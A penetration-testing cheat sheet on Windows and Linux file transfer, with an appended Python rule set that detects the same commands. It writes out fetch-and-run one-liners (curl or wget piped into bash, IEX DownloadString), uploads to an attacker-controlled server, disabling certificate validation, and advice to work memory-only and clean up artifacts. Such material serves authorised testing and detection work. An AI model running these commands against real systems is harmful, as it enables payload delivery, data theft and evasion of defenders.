# File Transfer Techniques for Pentesting

## Overview

File transfer techniques are critical for penetration testing, especially in restricted environments. This guide covers both Windows and Linux methods, with practical commands and methodologies.

## Common Challenges

* **Host-based Controls**
  * Application whitelisting
  * AV/EDR blocking
  * Process monitoring
* **Network Controls**
  * Firewall restrictions
  * IDS/IPS monitoring
  * Port filtering

## Windows Transfer Techniques

### PowerShell Methods

#### Base64 Transfer (No Network Required)

```powershell
# On Attacker (Linux)
cat file | base64 -w 0

# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))

# Verify Transfer
Get-FileHash C:\path\to\file -Algorithm MD5
```

#### Web Downloads

```powershell
# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')

# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')

# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile>
```

### SMB Transfer

```powershell
# On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support

# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe

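# Authenticated SMB (for targets that refuse unauthenticated guest access)
# On Attacker: require credentials on the share
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test
# On Target: map the share with the same credentials
net use Z: \\<Attacker_IP>\share /user:test test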
```

### FTP Transfer

```powershell
# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write

# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')

# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')
```

### Living Off The Land (LOtL) Binaries

* WMIC
* Bitsadmin
* Certutil
* Regsvr32

## Linux Transfer Techniques

### Base64 Transfer

```bash
# Encode
cat file | base64 -w 0; echo

# Decode
echo -n '<base64_string>' | base64 -d > file

# Verify
md5sum file
```

### Web Transfer Methods

#### Download

```bash
# Wget
wget <URL> -O /path/to/file

# cURL
curl -o /path/to/file <URL>

# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3
```

#### Upload

```bash
# cURL POST (--insecure skips certificate validation, e.g. for a self-signed server certificate)
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure

# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
```

### SSH/SCP Transfer

```bash
# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh

# Download
scp username@<IP>:/remote/file /local/directory

# Upload
scp /local/file username@<IP>:/remote/directory
```

### Simple Web Server

```bash
# Python3
python3 -m http.server

# PHP
php -S 0.0.0.0:8000
```

## Common Issues & Solutions

### SSL/TLS Issues (Windows)

```powershell
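# Accept any server certificate for the rest of this PowerShell session (e.g. a self-signed lab server).
# Every later HTTPS request made in the session is unvalidated as well.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}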
```

### Port Considerations

* HTTP/HTTPS (80/443) - Usually allowed
* SMB (445) - Often blocked
* FTP (20/21) - May be filtered
* SSH/SCP (22) - May require configuration

## Security Best Practices

1. **Transfer Verification**
   * Always verify file integrity (MD5/SHA)
   * Check file permissions after transfer
2. **Operational Security**
   * Clean up temporary files
   * Remove credentials after use
   * Monitor for security alerts
   * Use encryption when possible
3. **Fileless Operations**
   * Prefer memory-only operations
   * Clean up artifacts
   * Be aware of logging/monitoring
4. **Network Security**
   * Use HTTPS/FTPS when available
   * Consider file size limitations
   * Monitor for AV/EDR alerts
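
How the commands on this page look to process monitoring, as an added example that is not part of the original guide: a small Python matcher run over constructed command lines. The rule names, sample lines and addresses are assumptions made for illustration.

```python
import re

# Rule names are hypothetical labels; each pattern mirrors a command shown on this page.
RULES = {
    "ps_webclient_transfer": re.compile(r"Net\.WebClient\)?\.(DownloadFile|DownloadString|UploadFile)", re.I),
    "ps_fileless_iex": re.compile(r"\b(IEX|Invoke-Expression)\b.*DownloadString", re.I),
    "ps_invoke_webrequest": re.compile(r"\b(Invoke-WebRequest|iwr)\b.*-OutFile", re.I),
    "ps_base64_write": re.compile(r"WriteAllBytes.*FromBase64String", re.I),
    "ps_tls_validation_off": re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "sh_pipe_to_interpreter": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(bash|sh|python3?)\b", re.I),
    "sh_base64_decode_to_file": re.compile(r"base64\s+(-d|--decode)\b.*>", re.I),
    "unc_copy": re.compile(r"\b(copy|net\s+use)\b.*\\\\[^\\\s]+\\", re.I),
}


def match_rules(cmdline):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def scan(cmdlines):
    """Map each flagged command line to its rule names; clean lines are omitted."""
    return {c: hits for c in cmdlines if (hits := match_rules(c))}


# Constructed sample of process command lines (198.51.100.0/24 is a documentation range).
SAMPLE = [
    r"powershell -c (New-Object Net.WebClient).DownloadFile('http://198.51.100.7/a.exe','C:\Users\Public\a.exe')",
    r"powershell IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')",
    r"powershell [IO.File]::WriteAllBytes('C:\Temp\f.bin',[Convert]::FromBase64String('QUJD'))",
    r"powershell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}",
    r"cmd /c copy \\198.51.100.7\share\file.exe",
    r"sh -c 'curl -s http://198.51.100.7/s.sh | bash'",
    r"sh -c 'echo -n QUJD | base64 -d > /tmp/file'",
    r"curl -o /tmp/report.pdf https://intranet.example/report.pdf",  # plain download: not flagged
    r"powershell Get-FileHash C:\Temp\f.bin -Algorithm MD5",         # benign: not flagged
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE).items():
        print(f"{', '.join(hits):45} {cmd}")
```

Plain `curl -o` and `wget -O` downloads are deliberately left unflagged because their command lines match routine administration; separating them from a test in progress takes network or destination context rather than string matching.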


